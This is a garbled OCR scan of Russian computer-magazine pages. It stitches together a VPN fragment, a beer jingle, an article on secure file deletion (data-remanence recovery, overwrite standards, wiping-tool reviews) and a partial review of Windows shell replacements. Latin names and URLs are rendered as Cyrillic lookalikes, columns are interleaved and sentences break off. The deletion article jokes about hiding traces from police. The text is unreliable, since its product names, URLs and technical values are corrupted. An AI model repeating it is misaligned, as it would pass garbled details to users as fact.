таки, жрет много ресурсов. С другой — никто не мешает использовать РІІР 
второй версии, который научился понимать маски подсети и аутентифика- 
цию, чего не умел его предшественник @ 
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Музыка и слова 
ОВИП ЛОКОС 

ОВИП ЛОКОС! 

Мир меняется во имя добра, ^ 

Реальной силы наступила пора. 

ОВИП ЛОКОС! 

Пиво "Сокол" — не сегодня, не вчера. 

Вывод прост: это жизнь в полный рост, а не игра 
ОВИП ЛОКОС! 

Хорошо жить во имя добра. Да! 

Пиво "Сокол", все мы дети добра. 

ВИП ЛОКОС! 

Наш брат, мой брат, твой брат ему рад. 

Все подряд любят и хотят 
ОВИП ЛОКОС! 

Пиво "Сокол" будет с нами всегда. 



вопрос 



жизни 



все 



всерьез 



добра 



добра 



имя 



во 



имя 
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ЗИгесісІегз, 

ѴѴірегз, 

СІеапегз 
& Егазегз 

ПРИВЕТСТВУЮ, о, ВЕЛИКИЙ МОЙ ЧИТАТЕЛЬ! 
ВОССТАЛ Я ИЗ МЕРТВЫХ (ПЕРЕДАЙТЕ ПРИ- 
ВЕТ МАЙНДВОРКУ — Я ВОСКРЕС:)), ЧТОБЫ 
ВАЖНУЮ ТАЙНУ О ПРОПАВШЕЙ ИНФОРМА- 
ЦИИ ТЕБЕ ПОВЕДАТЬ, НО ЗНАЙ: К ТЕМНОЙ 
СТОРОНЕ ЭТО ВЕДЕТ... ТЬФУ, ВОТ ПРИЕ- 
ЛОСЬ-ТО! СЕГОДНЯ Я РАСКРОЮ ТЕБЕ ГЛАЗА 
НА ТАКУЮ ВАЖНУЮ В НАШЕМ ДЕЛЕ ПРОБЛЕ- 
МУ, КАК ХРАНЕНИЕ И ЗАЩИТА ИНФОРМАЦИИ, 
А В ЧАСТНОСТИ, ЕЕ ПОЛНОЕ И БЕЗВОЗВРАТ- 
НОЕ УДАЛЕНИЕ С УСТРОЙСТВ ХРАНЕНИЯ 

ДАННЫХ. I ЗИасЮЗ (ЗМас108@геа1.хакер.ги, ѵѵѵѵѵѵ.ги24-1еат.пеі) 

Безвозвратное 
удаление инс|эормации 



[іпігосіисііоп] Начну, пожалуй, о того, что раз- 
вею один из мифов, который прочно закрепился 
в умах обывателей: «Если человек скрывает что- 
то, значит, ему есть что скрывать!». Собственно, 
наши доблестные органы достаточно часто руко- 
водствуются этим заблуждением, что прямо на- 
рушает статью 23 и статью 51 конституции РФ. 
Так что даже если не занимаешься темными де- 
лишками, ты имеешь полное право шифровать 
содержимое своего диска и проводить регуляр- 
ную зачистку свободных секторов. 




[ІесИпоІодіез] Ну что же, перейдем к делу. 
Попытаюсь изложить тебе нечто более при- 
менимое, чем статьи конституции, а именно 
технологии безвозвратного удаления инфор- 
мации о магнитных носителей. Позволю себе 
напомнить, что я не ставлю своей целью на- 
писать мануал твоих действий в случае посе- 
щения твоего дома веселыми ребятами из 
маски-шоу, а всего лишь пытаюсь расширить 
твой кругозор в данной области и обезопа- 
сить тебя от различных любопытствующих, 
вроде соседа Васи снизу или тети Клавы 
сверху, которые не прочь покопаться в чужой 
личной информации, в том числе, и храня- 
щейся на твоем компьютере. 

Как тебе, надеюсь, известно, в том числе и из на- 
щего журнала, информация, удаленная сред- 
ствами операционной системы, будь то ѴѴІпсІоѵѵз 
или Еіпих, легко может быть восстановлена лю- 
бым мало-мальски продвинутым пользователем 
при наличии определенного софта, а уж тем бо- 
лее профессионалами, обвешанными спецобору- 
дованием, которое можно увидеть лишь в шпио- 
нских фильмах:). 
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Не пытайся скрывать про- 
тивозаконную информа- 
цию — большинство из этих 
утилит тебе не помогут. 

У спецслужб, наверняка, 
есть техника, позволяю- 
щая восстанавливать ин- 
формацию по неизвест- 
ным мне методам. 

Советую тебе отключить 
восстановление системы, 
так как реальную пользу оно 
приносит очень редко, и 
продвинутые люди давно 
пользуются чем-то вроде 
Нотіоп віюзі. Кроме того, 
многие программы из этого 
обзора в большинстве сво- 
ем не могут справиться с 
информацией, хранящейся 
в контрольных точках: имен- 
но она может выдать тебя. 



• не пытайся скрывать про- Простейшие технологии восстанов- 
тивозаконную информа- ления информации основаны на том, 
цию — большинство из этих что при удалении информации сред- 

ствами операционной системы фак- 
тически стирается информация из 
таблицы размещения о расположе- 
нии файла на диске, а информация, 
хранящаяся в области данных, оста- 
ется в исходном состоянии. И поми- 
мо того, например, в ѴѴІпсІо\л/з 2003 

® Советую тебе отключить Зегѵег существует так называемая 
восстановление системы, «система версий», которая предотв- 
так как реальную пользу оно ращает случайное уничтожение фай- 
лов пользователем. Измененные фай- 
лы хранятся в специально отведен- 
ной скрытой области диска (з1тас1о\л/ 
агеа), и их также необходимо уда- 
лять, чтобы предотвратить возмож- 
ность восстановления данных. Есть 
еще в ѴѴІпсіоѵѵз и временные копии 
файлов, и данные, находящиеся в 
файле подкачки, и за всем этим нуж- 
но следить, чтобы не упустить конфи- 
денциальную информацию. 

Но все же процедура восстановления стертых файлов без учета скрытых об- 
ластей сводится к последовательному поиску информации по всему жестко- 
му диску, однако этот метод не гарантирует полного восстановления и слож- 
ность его использования пропорциональны степени фрагментации файло- 
вой системы. Не стоит думать, что если ты ни разу не запускал дефрагмен- 
татор, это спасет тебя от посягательств на твои данные: если ты хоть немно- 
го ходил на институтские лекции по физике, тебе должно быть известно о та- 
ком явлении, как гистерезис (тьфу, и зачем я забивал на лекции по физике? 
:( — Прим. Бублика). Суть гистерезиса заключается в отставании изменения 
магнитной индукции от изменения напряженности магнитного поля Н. Грубо 
говоря, гистерезис обусловлен внутренним трением областей самопроиз- 
вольного перемагничивания. Именно благодаря (а может, и не благодаря :)) 
этому отставанию в областях на краях дорожки магнитного носителя, стано- 
вится доступным восстановление даже перезаписанной информации. 

В самом простом случае для уничтожения инфы достаточно открыть текстовым 
редактором желаемый файл и забить его случайной белибердой. Данный спо- 
соб уже однозначно отметает огромное число достаточно известных утилит та- 
ких, как Еазу Песоѵегу или ѲеЮаІаВаск, заставляя их нервно курить в сторон- 
ке. Но не стоит списывать их со счетов, ведь они создавались не для столь 
сложных задач, и речь о них я вести сегодня не буду . Однако спешу тебя огор- 
чить и, наконец, открыть страшную тайну: существуют специальные утилиты и 
устройства, которые позволяют восстановить информацию даже после столь 
сложных извращений с текстовым редактором. Кроме того, не стоит думать, 
что этими средствами обладают только спецслужбы: использование средств и 
методов восстановления инфы положено многими фирмами на поток, принося 
реальную прибыль в тоннах зелени... Ах да, я замечтался и отвлекся. 



[іпіогшаііоп 81а1іс СоІІесІіоп] Итак, первый из известных мне спосо- 
бов основан на статистическом накоплении информации при многократном 
считывании данных из секторов диска, которые подверглись зачистке. 
Суть этого метода можно пояснить следующим образом. Как известно, ин- 
формация на жестком диске хранится в двоичной форме — в виде после- 
довательности единиц и нулей, которые представляются различным обра- 
зом намагниченными участками поверхности магнитного носителя. Услов- 
но говоря, единица, записанная на жесткий диск, будет прочитана контрол- 
лером жесткого диска как 1 , а записанный 0 будет прочитан как 0. Однако, 
если поверх 0 будет записана 1 , то результат, условно говоря, будет равен 
0,95 и, наоборот, если поверх 1 будет записана 1 , результат будет равен 
1,05. Для контроллера эти различия совершенно несущественны. Но, ис- 
пользуя специальную аппаратуру, можно легко прочитать, какую последо- 
вательность 1 и о содержала искомая запись. 




хороший человек - 
Питтер Гутман 



Брюс Шнайер 



[МРМ] Второй метод был раз- 
работан не так давно и является 
еще более мощным средством 
восстановления. Он основан на 
принципах магнитной силовой 
микроскопии (МРМ) и сканирую- 
щей зондовой микроскопии. 
Разрешающая способность это- 
го метода достаточна для раз- 
дельного считывания несколь- 
ких последовательных записей 
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разнообразие методов в Асгопіз 



информации, а значит, (о, ужас!!!) тебя не спасет даже двух-, или даже 
трехкратное затирание данных! 



[Іор зесигііу] Но и здесь был найден выход из столь тяжелой ситуации. 
Методы гарантированного удаления информации существуют! И тебе сов- 
сем не придется долбить свой жесткий диск кувалдой, жарить и шпарить 
его в микроволновке, взрывать, отирать заводские сервометки магнитных 
пластин, скидывать с балкона, травить кислотой, отправлять в ядерный ре- 
актор или производить на НОО ультразвуковое воздействие: согласись, все 
это представляет собой страшное зрелище, хоть и влияет на магнитную по- 
верхность, порой, о огромным повреждающим успехом. 

Задача полного физического удаления информации вполне выполнима 
программными методами, и сводится к тому, чтобы произвести как можно 
больше записей поверх дорожки, содержащей секретные данные. Каждая 
дорожка должна быть полностью перемагничена, исключая воздействие 
гистерезиса (остаточную намагниченность). А эта задача, в свою очередь, 
сводится к безопасной минимизации количества итераций затирания. Од- 
нако, как и в любой задаче, минимизация очень часто граничит о безопас- 
ностью, и чтобы получить наилучший результат, необходимо применять ал- 
горитмы, четко ориентированные на каждую модель жесткого диска, что, 
согласись, достаточно сложно... Но умные люди давно все за нас с тобой 
придумали, причем так хорошо, что свели все алгоритмы в национальные 
стандарты, которыми пользуются и по сей день. Большинство этих алгорит- 
мов предполагают около четырех перезаписей. Кажется, немцы и здесь 
выиграли благодаря своей щепетильности, а за нашу страну мне стало 
стыдно, точнее, за тех «специалистов», которые принимают столь слабые 
алгоритмы уничтожения информации. Убедиться в этом и понять в чем суть 
(а суть-то в нашем подъезде:)), ты можешь, изучив таблицу во врезке. 
Интересная деталь: руководство по защите информации НІ8РОМ запре- 
щает использование алгоритма ОоО 5220.22-М для уничтожения данных 
с грифом: «СОВ. СЕКРЕТНО». 

Альтернативными способами в соответствии с ним же являются: 

Ш Размагничивание по стандарту Р-5239-26 МАѴЗО. 

[Ц Физическое разрушение. 



Среди всех перечисленных стоит особое внимание уделить двум, кото- 
рые я считаю наиболее надежными: Алгоритм Брюса Шнайера, кото- 
рый он предложил в своей книге «Прикладная криптография» и Алго- 
ритм Питера Гутмана, «вечного аспиранта» на кафедре компьютерной 



I ЧТО ТАКОЕ МРМ? I 

Вот так примерно описан метод МРМ на сайте ЕПОС 
Шр://еро8.кіеѵ.иа/риЬз/, одной из наиболее известных компа- 
ний, занимающихся восстановлением информации: 
«Магнитный наконечник зонда движется над поверхностью 
пластины на расстоянии порядка 10 — 100 Ангстрем. В зави- 
симости от силы магнитного взаимодействия между маг- 
нитной пластиной жесткого диска и читающей головкой, 
расстояние между ними изменяется. Эти колебания рассто- 
яния детектируются оптическим интерферометром. Полу- 
ченное изображение представляет собой образ распреде- 
ления намагниченности. 

Этими методами можно измерить магнитный рельеф пове- 
рхности диска и, следовательно, восстановить информа- 
цию. Вследствие очень высокой плотности записи, механи- 
ческая система привода магнитной головки не в состоянии 
точно следовать по требуемой траектории, следовательно, 
при записи новых данных поверх конфиденциальной ин- 
формации новые данные всегда будут записаны с некото- 
рым смещением относительно ранее записанных данных. 
Каждая дорожка магнитного диска содержит образ каждой 
записи, когда-либо сделанной на ней, но вклад каждой та- 
кой записи (магнитного слоя) тем меньше, чем раньше бы- 
ла сделана запись». 



[таблица основных алгоритмов] 

Руководство по защите информации 
МО США (МІ8Р0М) ОоО 5220.22— М, 1995г. 

Количество итераций: 4 

1- й проход — запись произвольного кода. 

2- й проход — запись инвертированного кода. 

3- й проход — запись случайных кодов. 

4- й — верификация записей. 

Американский МАѴЗО Р-5239-26 (РІІ) 

Количество итераций: 4 

1- й проход — 0x01 во все сектора. 

2- й подход — 0х27РРРРРР. 

3- й подход — случайные последовательности символов. 

4- 1 подход — верификация. 

Американский МАѴЗО Р-5239-26 (МРМ) 

Коичество итераций: 4 

1- й проход — 0x01 во все сектора. 

2- й проход — ОхУРРРРРР. 

3- й проход — случайные последовательности символов. 

4- й проход — верификация. 

Стандарт ѴІЗР (Рермания) 

Количество итераций: 7 

1-Й-6-Й проход — запись чередующихся последовательностей вида: 
0x00 и ОхРР. 

7-й — ОхАА, то есть 0x00, ОхРР, 0x00, ОхРР, 0x00, ОхРР, ОхАА. 

РОСТ Р50739-95Г. (Россия) 

Количество итераций: 1 

Запись нулей (чисел вида 0x00) в каждый байт каждого сектора 
для систем с 6-го по 4-й класс защиты. Запись случайно выбран- 
ных символов (чисел) в каждый байт каждого сектора для систем 
с 3-го по 1-й класс защиты. Алгоритм Б. Шнайера (Вгисе ЗсИпеіег) 
Количество итераций: 7 

1- й проход — запись логических единиц РРИ. 

2- й — нулей 0x00. 

3- 7 — случайно выбранных чисел. 

Алгоритм РІитера Гутманна (Реіег Сиітап). 

Количество итераций: 35 

Циклы }-А — запись произвольного кода. 

Циклы 5-6 — запись кодов 0x55, ОхАА. 

Циклы 7-9 — запись кодов 0x92, 0x49, 0x24. 

Циклы 10-25 — последовательная запись кодов от 0x00, 0x11, 0x22 
и т.д. до ОхРР. 

Циклы 26-28 — аналогично циклам 7. .9. 

Циклы 29-31 — запись кода 0x60, ОхВб. 

Циклы 32-35 — аналогично циклам 1..4. 

Быстрый. 

Количество итераций: 1 

Запись логических нулей (чисел вида 0x00) во все очищаемые сектора. 
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науки университета города Окленд, который разработал свою 
собственную систему уничтожения информации и инструментарий бе- 
зопасности СгурІІІЬ. Именно эти алгоритмы вызывают доверие и полу- 
чили наибольшее распространение. Одну из самых известных его ра- 
бот ты можешь почитать здесь: тт\л/.св.аискІапсІ.ас.пг/%7ЕрдиЮ01/ 
риЬв/зесиге_сІеІ.МтІ. 

Далее, при рассмотрении доступных программных средств, будем особое 
внимание уделять наличию этих алгоритмов. 

[подопытные] Ну что же, пожалуй, приступим к рассмотрению тех самых 
программных средств, но сначала упомяну, что злобный редактор Бублик 
так боялся, что эту статью заберут во «Взлом», что запретил мне рассмат- 
ривать утилиты для ипіх-Ііке систем, поэтому ругать надо только его. (Буб- 
лик, только попробуй удалить эту строчку. К темной стороне это ведет :)). 
Кроме того, я считаю, ты и сам не маленький, и вполне сообразишь, где ис- 
кать подобный софт под свою ореп-зоцгсе систему. Если не совсем полу- 
чится, пиши мне или Андрюшку — редактору рубрики Юниксоид. 

[Асгопіа Огіѵе СІеапзег] Первым в моем обзоре будет небезызвестная 
контора Асгопіз с ее утилитой Асгопіз Огіѵе СІеапзег. Обычно она входит в 
состав еще более крупного пакета обеспечения твоей безопасности Асгопіз 
Ргіѵазу ЕхрегГ Зиі(. Софт, производимый этой фирмой, достаточно хорош, в 
том числе и Огіѵе СІеапзег. Минусы у него все же есть, но скажу о них чуть 
позже. Сначала сухие факты о достоинствах этой системы: 

[Ц Огромный выбор алгоритмов (практически все, сведенные в таблицу). 

[3 Возможность составлять собственные методы затирания данных. 

0 Составление алгоритмов по шаблону. 

[З Достаточно приятный интерфейс. 

[3 Подробная документация. 

0 Удобное расширение рирцр-меню графической оболочки. 

Лично мне сразу в голову пришла мысль составить гибриды американских 
стандартов МІЗРОМ и NАVЗО, так как именно их комбинации применяются 
для удаления документов «Тор Зесгеі» (как было сказано выше, МІЗРОМ 
сам по себе для этих нужд не применяется). И это у меня отлично получи- 
лось. Кроме того, посоветую тебе забыть о такой комбинации клавиш, как 
зИіП-гсіеІ — их с лихвой заменит обычная корзина и затирание о помощью 
акронисовского чистильщика. 

А теперь обещанные минусы. Несколько раз во время тестовых прохо- 
дов по одному из моих разделов винчестера выдавалось предупрежде- 
ние о невозможности записи в сектор, чему я очень сильно удивился, 
ведь Ьаб-секторов на моем практически новом жестком диске не наб- 
людалось. Я выполнил полную проверку диска и его поверхности, но 
это ничего не показало, в результате баги были списаны на Асгопіз 
Огіѵе СІеапзег. Второй подобный минус заключается в том, что эта соф- 
тина по опять же непонятным мне причинам не может удалять некото- 
рые файлы, находящиеся в корзине. С учетом этого, приговор: исполь- 




конфигурируем ВСѴѴіре 



зование в боевых целях вполне возможно, только осторожно. Но дос- 
тупны и массивные превентивные атаки. 

[О&О ЗоІІѵігаге ЗаІеЕгаве] Вторым номером, щироко шагая, идет прог- 
рамма от О&О ЗоПѵѵаге под названием За^еЕгазе. Пожалуй, она ничем не 
уступает пакету от Асгопіз, а в чем-то и превосходит его. Как и продукт от 
Асгопіз, За^еЕгазе добавляет свое расширение к главному рорир-меню. 
Второй более надежный способ сокрытия следов подразумевает полное 
затирание всей системы. Его я не решился испытывать дома и Іезі-бгіѵе 
провел на одной из институтских тачек с 20 Гб НОС, 128 Мб НАМ и процес- 
сором Сеіегоп 600. В общей сложности процесс удаления занял три часа, 
причем два с половиной из них я и мой помощник — младший научный сот- 
рудник Зітт — подготавливались сами, заливая себя самым хакерским 
напитком. В результате Нипіігпе ЗоПѵѵаге ОізкЕхріогег показал, что НПО 
полностью забит нулями. Но все же мне эти полчаса показались веч- 
ностью: за это время мою дверь уже могли выбить, отрубить электричест- 
во, заломать мне руки и увезти в управление люди в черном... Печально, 
но факт остается фактом: юзать можно и нужно. Однозначно. 

[^е^ісо ВСѴѴіре] Номер три. иеіісо ВСѴѴіре. Вот это что-то совсем особенное: 
похоже, разработчики учли здесь все: и скрытые копии ѴѴІпсІоѵѵз, и остаточные 
данные в полу-занятых кластерах, и временные файлы, и данные НАМ, и ин- 
формацию в файле подкачки, и расписание, и полное удаление всей информа- 
ции. Уж простят меня разработчики, если я что-то забыл упомянуть. Единствен- 
ный недостаток этой системы в том, что пользоваться ей не так уж просто: она 
состоит из нескольких исполняемых файлов, причем каждый отвечает за свою 
юрисдикцию возможностей системы, и мне после всей красоты Асгопіз и О&О 
показалось, что порт этой системы изначально создавался под Ыпих. Ну не мо- 
жет быть столь мощной утилиты в таком разобщенном стиле под ѴѴІпсІоѵѵз. . . 

[Егазег, просто Егазег] В заключение стоит сказать о последней утили- 
те, которая отличается от остальных стилем распространения — она пол- 
ностью бесплатная и распространяется с исходными кодами по ѲРЕ-лицен- 
зии. Как и в ВСѴѴіре, здесь есть возможность удалять файлы, вытирать 
своп и зачищать свободное место по расписанию, также нет здесь ни не- 
мецкого стандарта, ни алгоритма Шнайера, и, опять же, как и в ВСѴѴіре лю- 
бителям командной строки есть, где разгуляться. 

[21оключение] На этом я закончу мой поучительный рассказ. По тради- 
ции (валенок, какая традиция? Это твоя первая статья :) — Прим. Бублика), 
я не буду четко подводить итоги и выставлять баллы оттестированному 
софту — у нас демократия и ты сам в праве выбирать то, чем будещь поль- 
зоваться, да и найти софт, помимо рассмотренного мной, не представляет- 
ся проблемой, если считаешь, что безопасность — это актуально. Если у 
тебя есть мысли, которыми ты хочешь поделиться — добро пожаловать на 
ѵѵѵт.ш24-іеат.пеі. Ну а я возвращаюсь в свой потусторонний мир, мир 
электронов и роутеров, мир красоты данных, туда, откуда прищел. Всегда 
ващ, скрытый операционщик... @ 
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КАК-ТО, ОДНАЖДЫ, ПРОЧИТАЛ Я СТАТЬЮ 
«ПОЛНЫЙ РЕ» В X 07(67), СОТВОРИЛ СЕБЕ 
ЭТУ СИСТЕМУ И ОБНАРУЖИЛ, ЧТО В КАЧЕСТ- 
ВЕ ГРАФИЧЕСКОЙ ОБОЛОЧКИ В РЕСОѴЕНѴ 
А83ІЗТАМТ ИСПОЛЬЗУЕТСЯ ВІАСК ВОХ И 
«ГРЕХ ЭТИМ НЕ ВОСПОЛЬЗОВАТЬСЯ» (С) 
СКАЙЛОРД. НО ТОЛЬКО Я ВОТ РЕШИЛ ЭТИМ 
ВОСПОЛЬЗОВАТЬСЯ ПО-ДРУГОМУ: ПРЕВРА- 
ТИТЬ (ХЫХ... НУ, ИЛИ ИЗВРАТИТЬ :)) СВОЮ 
ѴѴІМООѴѴЗ-иКЕ систему в иміх-юок :). ХО- 
ТЯ ЗДЕСЬ РЕЧЬ ПОЙДЕТ НЕ ОБ ЭТОМ, А В 
БОЛЬШЕЙ ЧАСТИ ОБ ИЗДЕВАТЕЛЬСТВАХ ПО 
ЗАМЕНЕ СТАНДАРТНОЙ ГРАФИЧЕСКОЙ ОБО- 
ЛОЧКИ ВИНДЫ — ЭКСПЛОРЕРА (НЕ ПУТАТЬ С 
ОБЩЕИЗВЕСТНЫМ ИШАКОМ (ІМТЕРМЕТ 
ЕХРЮРЕР). Я ВЗЯЛ НЕСКОЛЬКО АЛЬТЕРНА- 
ТИВНЫХ ГРАФИЧЕСКИХ ОБОЛОЧЕК (ѲРАРН- 
ІС-ЗНЕЕЕ, А ДАЛЕЕ ПРОСТО ЗНЕЕЕ, КОТОРЫЕ 
ОПЯТЬ ЖЕ НЕ СТОИТ ПУТАТЬ С УДАЛЕННЫМ 
ДОСТУПОМ К *М1Х-МАШИНЕ) И ПОПЫТАЛСЯ 
ИХ СРАВНИТЬ. НУ, А ЕСЛИ СОВСЕМ ОФИЕ(И- 
АЛЬНО СКАЗАТЬ, ТО Я ПРОВЕДУ СРАВНЕНИЕ 
ПРОГРАММНЫХ ПРОДУКТОВ, ЯВЛЯЮЩИХСЯ 
ЗАМЕНОЙ ГРАФИЧЕСКОЙ ЧАСТИ ИНТЕРФЕЙ- 
СА ПОЛЬЗОВАТЕЛЯ ОС ѴѴІМООѴѴЗ. О, КАК! ПО- 
ЕХАЛИ I ЗИасІОЗ {3^^асIоз@геаI. хакер. ги, ІСО #5922529) 

Стайлинг ѴѴіпсІоѵѵз 



[ВІаскВох] Ну что же, приступим. Захожу в пап- 
ку со сваленными в кучу шеллами, предваритель- 
но залитыми для изучения, и первое, что мне бро- 
сается в глаза — известный нам по никсовым сис- 
темам ВІаскВох, правда, в винде этот менеджер 
называется ЬЬ4ѵѵіп, но спутать его ни с чем невоз- 
можно. Существуют два способа установки 
ВІаскВох: первый — из инсталляционного пакета 
ЬЬ4\д/іп_іпз{аІІег и второй — из 2 Ір-архива (все доб- 
ро можно утащить с сІевкІоріап.огд/ЬЬ или зоигсе- 
іогде.пеі/ргоіесіз/ЬЬ4тг). Естественно, я как очень 
ленивый чел решил сначала испробовать инстал- 
лятор (а как известно, лень — двигатель прогрес- 
са:)). Установка проходит без особых трудностей: 
ставим все стили и плагины. Есть возможность 
поставить ВВ по умолчанию или запускать ручка- 
ми. Перезагружаемся. Смотрим. Ну ничего суперна- 
вороченного я, конечно, не ожидал, но то, что я 
увидел, меня очень обрадовало. Вот моя винда 
постепенно превращается в подобие линукса. 
Представьте себе ВВ, а в нем запущены МогіІІа 
Рігеіох, Ореп 0?Исе, 8ІМ и МтарРЕ. Душа радует- 
ся, а глаз еще больше:). Я замечтался... Все глав- 
ное меню открывается теперь по правому батону 
мыши. В стандартном инсталляторе есть только 
два стиля: сітагсоаі и аідае, но не стоит расстраи- 
ваться по этому поводу — их существует доста- 





Шр://Шшіп.огд — ВІаскВох. 
шшѣкіітшюлеі — З/шрЕ. 
шѵі.соигІаІ].пеІ — Зегепасіе. 
шшІюѵетѣ^М — НотСЫ. 
Шр://ІПе$Іер.пеІ — иіеЗІер. 
шш.ав1опвМ1.сот — Авіоп. 
шш.ІідШек.сот — Таіівтап. 
шшш.шіпвіерлеі — ШпЗІер. 
шшш.тісгозоП.сот/сІошп- 
ІоасІв/геІеазе.азр?геІеа- 
зеШ=12651 — ѴівиаІВазіс, 
необходимый для ѴѴІпвІер. 
Шр://безкІоріап.огд/Ш 
рІидіпШМтІ — планины 
для ВаскВох. 
ѵ/ш.беѵіапагі.сот — ог- 
ромное количество обоев, 
палгинов и тем практически 
для всех гра{рических обо- 
лочек из статьи. 
бйр//безкІоріапг>тд — сайт, це- 
ликом и полнощью посвящен- 
ный графическим шеллам. 

На нашем диске ты найдешь 
полные версии программ, 
описанных в этой статье. 



точное количество, кроме того, можно (и нужно) 
самому их изменить. Для тех, кто никогда не ви- 
дел и не пользовался ББ в Никсах (или вообще 
Никсами не пользовался... сочувствую), следует 
заметить, что все конфиги ББ хранятся в простых 
текстовых файлах, но это совсем не означает, что 
ББ сложно настроить по своему вкусу. Всего лишь 
пару затраченных минут на изучение хелпа, плюс 
еще десять на написание конфигов, и мы получа- 
ем шелл, ничуть не уступающий эксплореру, а мо- 
жет и в чем-то превосходящий его... 

Конечно, ВІаскВох не имеет всех графических 
наворотов, присущих другим зІтеІГам, но это в 
большей степени относится к его достоинствам, 
а не к недостаткам. Как и никсовый собрат, ВВ 
дает возможность переключения между несколь- 
кими рабочими столами. Есть и отличные плаги- 
ны, дающие возможность, например, полностью 
настроить горячие клавиши. Кроме того, эта обо- 
лочка занимает достаточно мало места в памяти 
(примерно 4000 Кб), что дает возможность ис- 
пользовать ее на слабых машинах. 

Надо бы еще сказать пару слов об установке из 
архива. Распаковываем архив, например, в папку 
СЛВІаскЬох, заходим в нее и редактируем файл 
ЫаскЬох.гс. Изменяем значения зеззіоп.гпелиРІІе 
и зеззіоп.зІуІеРІІе на путь к тепи.гс (текстовый 



файл, в котором описаны элементы меню) и путь 
к стилям. Если где-то откопали плагины, то в файле ріидіп.гс прописываем 
путь к ним. Хорошо было бы еще скачать ВІаскЬох {оп( раск — в противном 
случае будет доступен только шрифт ѵеггіапа, что не совсем пригодно к 
восприятию. В конечном итоге после всех мучений запускаем ЫаскЬох.ехе 
и наслаждаемся жизнью. Для полноты картины советую еще испытать 
□агкзіер и ВІиеВох. Все эти три менеджера сделаны по образу и подобию... 
Эээ... В общем, все они похожи как по внешнему виду, так и по способу 
настройки. Вперед, товарищи! :) 

[Іііеаіер] Перейдем к изучению следующего подопытного. Сразу же обра- 
щает на себя внимание инсталлятор. Выбираем полную установку. Инстал- 
лятор просит указать пути к используемым по умолчанию программам — 
прописываем. Нас просят перезагрузиться — перезагружаемся. Опять смот- 
рим. Ну, здесь минимализмом ВІаскВох и уже не пахнет — это действитель- 
но приятный по виду зітеіі. ИМХО. На первый взгляд, выглядит он не очень 
симпатично, но я видел этот збеІІ в полной его красе. Как и все ?гее\д/аге-про- 
екты, ІІІезІер із ?иІІу-сиз1оглІ2аЫе, так сказать. Для тех, кто в танке, поясняю: 
из фекальки получаем конфетку путем выпрямления рук и правки конфигов :). 
Все желающие могут скачать фИрМеѵ.ШезІер.пеІ/сІоппІоасІ.рНр) исходники и 
собрать ІІІезІер у себя на тачке, что благотворно повлияет на оптимизацию, 
а значит, и на скорость работы — проверенно лично. Для жаждущих советую 
сначала почитать документацию на их сайте о том, как правильно это делать. 
Существует огромное количество тем и плагинов к нему, чего и следовало 
ожидать, ведь этот зітеіі является одним из популярнейших. Больше всего 
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мне приглянулась тема, косящая под ВІаскВох — советую и вам ее испытать. 
Короче, его стоит поюзать (тут некоторые зловредные элементы завопили: 
“У кого короче, тот сидит дома и оттягивает», но объем статьи меня ограни- 
чивает, так как хочется рассмотреть побольше оболочек). Дерзайте. 



раз выскочила мессага Оиі о( тетогу, иногда по непонятным причинам 
Шарп начинал тормозить и даже падать, а после ребута предлагал запус- 
тить свою панель без плагинов (нашли виноватых :)). Будем надеяться на 
следующие версии, ведь задумка-то интересная. 



[$ЬагрЕ] Необычная вещица. Раньше этот шелл назывался БИагрОЗ. 
Как и предыдущие испытуемые, он тоже совершенно бесплатный и как 
сказано в РАО, продолжает им быть. Что же, посмотрим поближе. Выби- 
раем полную установку — ставится молча, потом спрашивает: «Не хоти- 
те ли вы сделать ЗбагрЕ дефолтным зІіеІГом?», и еще рекомендует сме- 
нить ХР-Іодоп на МТ-Іодоп. Зачем — для меня так и осталось загадкой, од- 
нако соглашаюсь. Опять нас просят перезагрузиться, и как вы уже дога- 
дались — перезагружаемся и опять смотрим. Не знаю, почему, но этот 
шелл мне сразу полюбился, была в нем какая-то изюминка и казался он 
каким-то иным. Перед моим взором предстала необычная картина: в 
верхней части экрана находится панель о некой кнопкой, являющейся 
симбиозом пуска и часов, по нажатию которой открывается меню, анало- 
гичное тому, что открывается и правой кнопкой крысы. Как потом оказа- 
лось, это один из плагинов, и эта панель специально предназначена для 
них. В стандартной поставке следует отметить плагины управления 
ѴѴІпатр'ом, плагины погоды и текстовых заметок. Кстати, все плагины пи- 
шутся на дельфи, и если ты обладаешь достаточными знаниями, вполне 
можешь нацарапать что-то свое, а исходники некоторых уже готовых мо- 
жешь найти по адресу \л/ѵ\/ѵі/.545зІисІіов.сот. В нижней левой части экрана 
теперь находится системный трей, а справа — переключатель рабочих 
столов. Любой элемент рабочего стола теперь можно скрыть, изменить 
его положение на экране. Если собираешься использовать этот шелл, 
постарайся забыть о ярлыках на рабочем столе. Испугался, да? А нафик 
они вообще нужны? Шучу. Просто вместо ярлыков здесь используются 
так называемые Десктоп-Обьекты. Сначала создается заготовка такого 
объекта на рабочем столе, после чего выбираем его тип: файл, папка, 
диск или урл, указываем путь, и вот оно уже готово к применению :). По- 
ра добавить и ложку дегтя ко всему вышесказанному: несмотря на до- 
вольно приятное впечатление, ЗбагрЕ нельзя порекомендовать к повсед- 
невному использованию — работа с ним не обошлась без оказий — пару 





[Іаііашап твоей винды] Незаслуженно забытый вітеіі-геріасетепі. Он, 
конечно, достоин внимания, вот только стандартные темы мне не очень 
понравились — советую закачать себе чего-нибудь еще. Таіізгпап славится 
своими плагинами, среди которых попадаются довольно интересные экзе- 
мпляры. Есть здесь и свой скриптовый язык. Все фишки этого зІтеІГа слож- 
но перечесть, но главная из них — это НАСТОЯЩИЕ возможности настрой- 
ки всего и вся. Хочешь другие кнопки? Не проблема. Рисуй свои и встав- 
ляй их в любую тему. Часы в другое место переместить? Да куда угодно, 
просто меняем циферки X и V. И это относится не только к часам, а ко 
ВСЕМ объектам рабочего стола. Прозрачность? И это здесь имеется. И да- 
же в меню с русским все в порядке. В памяти это чудо занимает 6176 Кб, 
что не может не радовать. Н-да, все бы ничего. Вот только стандартные те- 
мы мне не очень понравились... 

[вегепасіе] Этот пакет поставляется только в виде инсталлятора достаточ- 
но небольшого размера (650 Кб). Установка проходит без особых проблем. 
В хелп можно и не заглядывать — там полезного почти ничего и нет. После 
перезагрузки замечаю первые неприятные моменты — панель задач отоб- 
ражает кракозяблами русские шрифты. Тут я заметил в правой нижней час- 
ти экрана кнопочку Сопіідиге и, естественно, жмякнул ее, тогда моему взо- 
ру открылось окно, где на вкладке для продвинутых (дык об Адванседе и 
речь... ;)) я обнаружил дерево настроек. Такое ощущение, что программеры 
писали это все только для себя, потому что разобраться сразу в этом проб- 
лематично, тем не менее, я обнаружил параметр епсобіпд и везде заменил 
